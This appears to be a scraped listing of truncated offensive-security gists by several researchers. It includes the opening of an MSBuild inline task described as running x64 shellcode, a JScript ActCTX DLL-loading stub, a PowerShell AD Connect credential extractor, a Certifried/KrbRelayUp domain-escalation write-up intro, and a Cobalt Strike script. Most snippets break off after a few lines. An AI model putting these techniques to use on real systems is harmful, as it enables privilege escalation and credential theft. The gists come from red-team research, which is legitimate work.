janoglezcampos

#include <windows.h>
#include <stdio.h>
#include <psapi.h>

typedef char * (*ParseHeaders)(LPCSTR, int *);

BOOL bCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)
{
    for (; *szMask; ++szMask, ++pData, ++bMask)
        if (*szMask == 'x' && *pData != *bMask)  

tothi

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

rvrsh3ll

//Example Reference:
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/
// Test 


new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools';
// Change that C:\\Tools to a location you specify, or dynamically find current directory.
// ActCTX will search for the DLL in TMP

var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 	<assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> 	<file name="dynwrapx.dll">     	<comClass         	description="DynamicWrapperX Class"         	clsid="{89565276-A714-4a43-912E-978B935EDCCC}"         	threadingModel="Both"         	progid="DynamicWrapperX"/> 	</file>  </assembly>';

CCob

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <!-- This inline task executes x64 shellcode. -->
  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
  <!-- Save This File And Execute The Above Command -->
  <!-- Author: Casey Smith, Twitter: @subTee --> 
  <!-- License: BSD 3-Clause -->
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask

HarmJ0y

@Library('ci-jenkins-common') _

// Jenkins build pipeline (declarative)

// Project:         Seatbelt
// URL:             https://github.com/GhostPack/Seatbelt
// Author:          @tifkin_/@harmj0y
// Pipeline Author: harmj0y

def gitURL = "https://github.com/GhostPack/Seatbelt"

xpn

Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return

rsmudge

#
# Demonstrate how to queue tasks to execute with each checkin...
#

#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
# 
sub stuffToDo {
	# Tasks for first checkin

3xocyte

#!/usr/bin/env python

import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES

# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)

jthuraisamy

Windows Toolkit

Binary

Native Binaries

• IDA Pro

IDA Plugins	Preferred	Neutral	Unreviewed

LiveOverflow

pragma solidity =0.4.25;

contract AcoraidaMonicaGame{
    uint256 public version = 4;
    string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
    string public constant sampleQuestion = "Who is Acoraida Monica?";
    string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
    Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
    address questioner;
    string public question;